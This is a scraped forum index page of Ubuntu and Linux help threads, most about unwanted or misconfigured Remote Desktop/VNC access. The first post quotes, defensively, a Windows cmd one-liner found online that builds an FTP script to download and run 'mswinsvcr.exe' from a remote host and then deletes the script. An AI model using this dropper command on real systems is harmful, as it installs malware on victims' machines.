Ubuntu Security :: Unwanted Remote Desktop Access And Attempted Hack

Jul 20, 2010

I was running ubuntu 10.04 on a school laptop connected to the network. I was editing a file in emacs on an ssh connection to a school server when all of a sudden I see the remote desktop graphic (a thing that looks like a widescreen monitor) pop up in the top panel. A second later it announces that someone else has connected to my computer with 'ffff:someip'. I'm not sure of the specifics because I was too shocked. I do remember it started with some number of f's before a : The hacker then started typing
Code:
%systemroot%system32cmd.exe
del eq&e

I promptly yanked out the ethernet cable before anything else could be typed. I then went in and changed the Remote Desktop preferences to not allow anyone in. I'm guessing that I cut the hacker off from fully entering in a command similar to this:
Code:
%systemroot%system32cmd.exe
del eq&echo open 0.0.0.0 13643 >> eq&echo user 13302 30046 >> eq &echo get
mswinsvcr.exe >> eq &echo quit >> eq &ftp -n -s:eq &mswinsvcr.exe &del eq
which I found here: [URL]

How concerned should I be? It appears to be a windows hack. Did I prevent any damage from occurring? Is Remote Desktop really that easy to connect to another persons computer? I know this question is bait in a way. On my home machines I only allow vnc via ssh tunnels and that is through a router with proper port forwarding for the ssh ports and very few other ports forwarded. Such an attack has never happened to me at home. Is this possibly due to my setup or was I just lucky no one picked my computer to hack? So is the ssh tunnel & port forwarding a sufficiently safe setup or am I still at risk?

What degree of protection does the ssh tunnel and port forwarding provide? What else should I do to make my current home setup even more secure? The text I wrote above was the only text typed into the terminal. Because the attack was over Remote Desktop, what is the possibility that it was a bot? The text appeared slow enough for me to think that there was a person rather than a machine/program typing in the text. Does the Remote Desktop connection in a way provide a level of abstraction that prevents scripts as commands must be typed in through the Remote Desktop connection (vs. a ssh connection where a script might more easily be uploaded and executed)?

In the end I'm curious as to what else might have been accessed over the connection or if it was probably just restricted to the hacker attempting to run some windows commands? Since they connected via Remote Desktop and I saw the connection pop up and the typing begin in my terminal, did I see everything that the hacker attempted to perform? Am I correct in my research in finding that there is no log for Remote Desktop connections and therefore I can't find the ip they were connecting from? However, I would like to use this as a wake up call to myself to prevent unwanted access on my home computers.

View 9 Replies


ADVERTISEMENT

Ubuntu Security :: Random Outside IP Trying To Access Remote Desktop

Jun 5, 2011

I was sitting watching a TV show on the internet (streaming from channel 4) and all of a sudden I get a request from an unknown IP address, outside of my local network attempting to access my ubuntu desktop, I obviously declined straight away and stupidly didn't take note of the IP I've checked my firewall settings and no ports are being forwarded, everything is as it should be. I am running Ubuntu 11.04, and a little bit concerned. As of now I have completely disabled remote desktop on my laptop.

View 1 Replies View Related

Ubuntu Security :: Host Always Ask Password On 1st Remote Desktop (VNC) Access

Dec 30, 2010

host always ask password on 1st remote desktop (VNC) access Desktop version... how can I disable this?

View 2 Replies View Related

Ubuntu Networking :: Remote Desktop Access "Your Desktop Is Only Reachable Over The Local Network. Others Can Access Your Computer Using The Address 127.0.0.1 Or Tabatha.local"

Feb 19, 2010

Running Ubuntu 9.10. In the Remote Desktop config dialog I get: "Your desktop is only reachable over the local network. Others can access your computer using the address 127.0.0.1 or tabatha.local." I understand this means only the loopback ip address is available. All my other machines show their true local ip address (e.g., 192.168.1.104) in this dialog. Thus I cannot log on to this desktop from other machines.

When I try to do a remote logon from another Ubuntu 9.10 box (or from an XP box using a VNC viewer), I get: "Connection to 192.168.1.102 has been closed." What steps are needed to make this machine show its actual ip address? All file sharing between the various machines is working properly and all windows shares back and forth between XP and 'nix, and among the the vaious XP boxes and linux boxes are available as designed.

View 1 Replies View Related

Ubuntu Security :: Security Changed In Remote Desktop?

Jul 6, 2010

I always use VNC to check my server for updates, and this morning I started the xvnc4viewer to vnc into my server and it keep asking for a password. I never setup a password because I do this local from my laptop, and I am the only one who uses my laptop. I had to go to my server and check the setting in System > Preferences > Remote Desktop and found them all changed. There was a password setup and there was a check mark in the you must confirm each access to this machine there some security update that changed all these setting? Sometimes when I do updates I don't know what is being changed on my server

View 9 Replies View Related

Ubuntu Security :: Remote Desktop (VNC) And Security?

Mar 24, 2010

So I've read a bit and it seems that this is okay and secure. But I wanted to double check here with everyone, because I trust here more than just about anywhere. I've read about the hipporemote (which is pretty cool) and I have it working. Basically I want to make sure my system is still secure.

1. I had to open a port on my firewall for the VNC connection.

2. I turned on the Remote Desktop
2a. Checked Allow other users to view....
2b. Checked Allow other users to control....
2c. Checked You must confirm.....
2d. Checked for password, and put in a password
2e. Checked Configure network automatically to accept connectios

So with doing all of that, am I ok? I think so, especially since it says its only accessible on my local network. But I just wanted to hear from people who know more than I do that I don't need to worry any more than normal about others accessing my machine. I'm mainly thinking 2e, I don't fully understand what's going on there.

View 9 Replies View Related

Fedora :: 14 - 'hack' Account And Get Access To His Files

Feb 12, 2011

Last week some bad news hitted us, my uncle deceased at the age of 39, to young and very unexpected. We enherited his computer, but theres a password on his account. Googling didnt really worked for me.. I have totally 0 experience on linux systems. Is there a way to 'hack' his account and get access to his files, fotos and other stuff that is precious to us?

View 12 Replies View Related

Security :: Hack Website For CCNA Study Sake?

Jan 11, 2010

I am currently taking my CCNA course. I have come to realize that to be a great Admin and secure a companies data, you first have to know it's weakness. Now I have become aware of a few programs like John the ripper telnet password crack, nmap, and the like. Well I have used nmap to port scan my own website for practice. I received some good intel on what ports are open and vulnerable. I am now trying to figure out how to hack in.To get my website info I used :

[Code]...

View 12 Replies View Related

Ubuntu Security :: How To Remote Access Home Pc

Jan 29, 2010

how i can remote access my pc at home from work ? on different pc that has access to INTERNET. what software shall I install on my pc at home ? I want to be able to install software on my pc at home from my work place, my home pc has unbuntu Linux ubuntu 2.6.31-17-generic #54-Ubuntu SMP Thu Dec 10 17:01:44 UTC 2009 x86_64 GNU/Linux

View 9 Replies View Related

Ubuntu Security :: Remote Desktop Used From Internet?

Mar 21, 2010

Today I noticed my Desktop was being controlled remotely from over the Internet even though I had it set for 'local network only'. Foolishly I relied on this setting and hadn't specified a password or other security. The remote user had opened my Firefox passwords page and was perusing this when I pulled the plug.

All external checks confirmed that my router/firewall is actively blocking correctly. How could this happen? How can I prevent this in the future? I had recently install the Firefox extension for Weave Sync and wonder if that had anything to do with it?

View 9 Replies View Related

Ubuntu Security :: Unauthorised Remote Desktop?

Nov 26, 2010

I just had a window pop up on my desktop saying my pc was being remotely controlled. Ubuntu 10.10The pc shutdown by itself, and I disconnected it from the net.I rebooted and uninstalled the remote desktop app.

View 7 Replies View Related

Ubuntu Networking :: Remote Desktop Access From Outside LAN?

Mar 13, 2011

I just set up Remmina the other day to be able to access my desktop remotely. However, I can only do this when I am connected to my home network. Is there a way to set up Remmina so that I can connect to my desktop remotely from outside my home network?

View 4 Replies View Related

Ubuntu Security :: Remote Access To Windows Partition?

Aug 8, 2010

Is it possible to remotely access, inject, manipulate files and/or folders in the Windows NTFS partition when logged into Ubuntu?

I'm either logged into Windows or Ubuntu but NOT both -- ever. Therefore, while logged into Ubuntu, would it be possible for someone to crack into Windows via Ubuntu using Wi-Fi or modem?

View 5 Replies View Related

Ubuntu Security :: Mount.ntfs Ran On Its Own - Normal Or External Hack/break-in Attempt?

Aug 2, 2010

Running Ubuntu 10.04 I noticed my hard disc rumbling for longer than normal and louder. Not doing anything demanding to cause hard disk activity like this so I was suspicious so I checked my process list with 'top' command in the console terminal. At the top was mount.ntfs running. Eventually it stopped running after 20 seconds or so. At the time I have not been accessing NTFS filesystems, but I do have them. I have a dual boot Ubuntu 10.04 and Windows 7. In Ubuntu I've mounted the Windows main C drive and on the same hard disk a partitioned drive for sharing files between the OSs. I know mount.ntfs is a standard program but was it being run on my machine, instigated externally here? Was the running of mount.ntfs an attempt from outside to hack into Ubuntu and the mounted Windows areas of my machine via a backdoor connection or vulnerability? I've restarted my machine since then. Are there any logs I can check for malicious attempts to break in?

View 9 Replies View Related

General :: NTP - Remote Host Refused An Attempted Connect Operation

Jul 24, 2011

When I do a ntpq -p on my machine I could see the ntp servers configured and it's status:

But when I telnet to ntp server "10.1.35.2" it says A remote host refused an attempted connect operation:

I know * here represents that the machine is in sync with ntp server. My question if the machine is in sync with ntp server, how does it work?why ntp port 123 is connection refused?

View 1 Replies View Related

Networking :: Can't Get Remote Desktop Access

Feb 23, 2011

my g/f was able to access her jobs computers from home in Windows. she'd go start->program->access->connect to remote desktop... (or something like that) in any event, i've found some programs in Fedora 14 that say they'd do the same, however i can't get it to work. in "remote desktop viewer" i'm trying to use 'VNC' protocol,and trying to put the ip in the first of the "Host" lines.

now, there might be another issue, is it possible she need more info than the ones she got in order to use LINUX remote desktop? she has (what she has written down as) Computer # 111.111.111.11 and then ';' and 4 additional numbers, so (for the sake of the example) computer#: 111.111.111.11;2222 she has a 'username' and a 'password'.

View 1 Replies View Related

Ubuntu Security :: VNC Setup With SSH Tunneling For Remote Desktop

Feb 16, 2010

I am attempting to set up a VNC with ssh tunneling for remote desktop between my laptop (opensuse 11.2) and my desktop (kubuntu karmic) and using the instructions here: [URL] and here: [URL] but I am having trouble getting remote desktop to work once I establish the ssh tunnel

I start out with
Code:
ssh <user@remotepc> -p <non22port> -L 5900:localhost:5900
That seems to wok and connect properly

The problem comes when I try to use a remote desktop client on the laptop to initiate the VPN desktop sharing and point it to
Code:
localhost:5900

Thats when I get a notification on the host saying:
Code:
Refused uninvited connection attempt from 127.0.0.1

And on the laptop I get:
Code:
VNC server closed connection

I have tried messing with the few settings in Krfb, but none seem to have any impact. How do I open localhost:5900 and allow VPN tunneling to the host machine?

View 2 Replies View Related

Ubuntu Security :: Firewall Killed Remote Desktop?

Aug 1, 2011

I have been using Remote desktop on Windows 7 to view and control my Ubuntu machine in the office quite happily over the office network. No problems there. I wanted to access it from my home connection so I read that I could do this by opening a port on the ubuntu machine's firewall. So I installed a firewall. Didnt see any way to open a port easily so I uninstalled it and installed another one. Same issue so I uninstalled that and then left it. I then tried to Remote Desktop the Ubuntu machine from my Windows 7 laptop and ERROR I can no longer connect.

View 6 Replies View Related

Security :: Ubuntu Remote Desktop Connection Breech?

Apr 27, 2010

I was working on my desktop under Ubuntu 9.10 when I got a message in the the upper right telling me that my Remote Desktop Connection had been activated. I don't know who it was, but they proceeded to open up a terminal and start typing a bunch of stuff. This scared the living @#$^ out of me, so I didn't really pay attention to what he was doing and immediately dove for the reset button. I disconnected my network from the web and found that RDC was NOT password protected.

Now, I probably did this a little while ago while I was playing around with it, but I also set up an account with dyndns.org. Would this possibly increase the number of attacks on my network? Just in case, I have removed my listing. Also, would any of this incident be logged somewhere? How/Where would I look to see if I'm being poked and prodded for another security hole?

View 6 Replies View Related

CentOS 5 :: 5.6 Upgrade - Security For Remote Access?

Aug 19, 2011

I setup a remote web server yesterday evening, which had Centos 5.3 on it. This went well, and I did this mostly over vnc, to get a GUI. However, I hadn't realised that there was a pending cron job to 'yum upgrade'. So, come 2am, 5.3 turned into 5.6. I carried on the install today, but after some time (I'm not sure exactly how or when), I lost the ability to run any GUI system config tools that required root login. I also lost the ability to run anything graphical - emacs, for example, when I was already root in an xterm.

/var/log/secure isn't telling me anything. It claims that it's running the config tool on my behalf, but nothing happens. If I try to run emacs, I get a message saying that the X server isn't responding. Could this be related to the upgrade? It feels like a PolicyKit problem - I've seen something similar on 6.0 for remote access over vnc - but 5.6 isn't running PolicyKIt.

View 1 Replies View Related

Ubuntu Networking :: Remote Desktop Access Refused

Feb 17, 2010

I have 4 boxes on a local network: 2 with XP only, 1 with Ubuntu 9.10 only, and 1 with both. All boxes can share folders, set up with share-admin instead of using Nautilus right-click properties for each folder. I can see and control the remote desktops on all boxes, to all other boxes, from all other boxes,with one exception: I can only access the XP desktop on the dual boot box, not the Ubuntu desktop. When I try I get: "Connection to host 192.168.1.102 was closed." I am refused access to the Ubuntu desktop in this manner from both the other Ubuntu machine, and from both XP machines.

My setups are basically plain vanilla with routine installs of Ubuntu 9.10. On the XP machines I am using TightVNC on the XP machines to view both other XP desktops, and the Ubuntu desktop that is accessible. On both Ubuntu setups I am using (I suppose) vino and vinagre, and have completely re-installed what I think is the relevant software. There is no firewall running on the Ubuntu dual boot, when I check ufw. For reasons I cannot determine the inaccessible Ubuntu desktop is not providing its own address but instead in the Remote Desktop config dialogue it identifies itself as 27.0.0.1 which I think is the loopback id. I know so little about this sort of networking that I am not giving all relevant info, but I still thought I'd try.

View 1 Replies View Related

Ubuntu Installation :: Remote Desktop Access Not Working

Oct 28, 2010

I have just installed linux 10.10, I want to use vnc on my another computer to access my desktop using remote access. When I navigate to Remote esktop Preferences. Your desktop is only reachable over the local network. Others can access your computer using the address localhost, no ip address. this is not working.

View 5 Replies View Related

General :: Remote Access To Ubuntu Desktop From Windows?

Aug 26, 2010

I am having the following problems:I have tried installing vnctightserver on Ubuntu and then installing the viewer on my windows machine but when I try to connect it rejects the connection....I need to remotely access the ubuntu-desktopn my ubuntu server LTS 10.04..... I have tried a number of guides but none are working for me....I have a firewall installed (iptables) but the neccesary ports have been opened up but my server still rejects incoming vnc connections.On a side note I do not have physical access to the server so all setup needs to be done via SSH...

View 3 Replies View Related

Ubuntu Security :: Access Remote Hard Drive From Another Computer

Jan 12, 2010

What I want to do is pull data from any of the hard drives attached to my Linux box from my Windows machine. I have been moving small amounts of data from the drives to my OS drive and those parts share easily, but I want to move away from that method to move large amounts of data at the same time.I have tried using Samba as it is used for file sharing between systems and that I have to give my Windows box permission through Samba.

Trick is, I'm not sure where to start, though I have an idea and wanted to know if this is the right track before I start editing my file system.

View 3 Replies View Related

Debian :: Can't Access Remote Desktop On Lenny / Ssh OK

Aug 7, 2011

Weird thing going on on my headless lenny box. The shared desktop won't let me in.I am trying to connect with my Mac, ssh is ok. I can connect, start vino-preferences, change everything I want to change, and still it won't let me in. both Mac Ctrl-k to vnc://lenny and Chicken of the VNC won't connect.

View 2 Replies View Related

Fedora Networking :: Can't Access Remote Desktop

Jul 16, 2010

New Fedora 13 Install. I have Remote Desktop Enabled. I can access the machine from itself but not others on the network. I stopped the firewall, that did not work. I looked in hosts.allow and hosts.deny, no entries there. The vino server is running. There is nothing in /varlog/messages, dmesg or /var/log/secure, at least nothing I could find related to vino. What else can I check? The conf file in my home folder looks exactly like one on another machine where it is working. forgot to add the message I get when I try it from a remote machine is "The connection to host 192.168.1.100 was closed". So it appears something is actively rejecting the login.

View 6 Replies View Related

OpenSUSE :: Remote RDP Server Desktop Access

Nov 21, 2010

so it's been a while [a long while!] since I needed any desktop access to my suse server.... what are my options for an RDP server these days? VNC and.....? is there anything else? anything better?

View 9 Replies View Related

General :: Remote Desktop - Access Box From Browser?

Aug 21, 2011

I use a hosted machine for work which has vnc and apache servers running. To work on a shell, I connect to the VNC server, and to access files I host them using apache and open them from my browser. It would be great if I can access my shells via my browser itself instead of using VNC or command prompt.

I am looking for an end result like this: [URL].. What are my options? PS: I already tried [URL]..but this uses a java applet to run and does not do it in browser itself.

View 2 Replies View Related

General :: Best Remote Desktop / Access Software?

Sep 22, 2010

what is a good software i can use to rdp to my linux rh5 from a windows computer

View 3 Replies View Related

Networking :: Secure Remote Desktop Access?

Feb 7, 2010

They are running Kubuntu. How to access their desktop from my home or office using Internet. Logically I remembered about kfrb and X11-vnc. But both of them need some approach to provide security. I'd like if someone could give me some pieces of advice on choosing the simplest and better approach:

To secure kfrb or x11-vnc is simpler or better to mount a vpn or to use an ssh tunnel? Is there any other solution? My pearents ISP use DHCP, so I think it would require some service like dyndns or similar...

View 2 Replies View Related







Copyrights 2005-15 www.BigResource.com, All rights reserved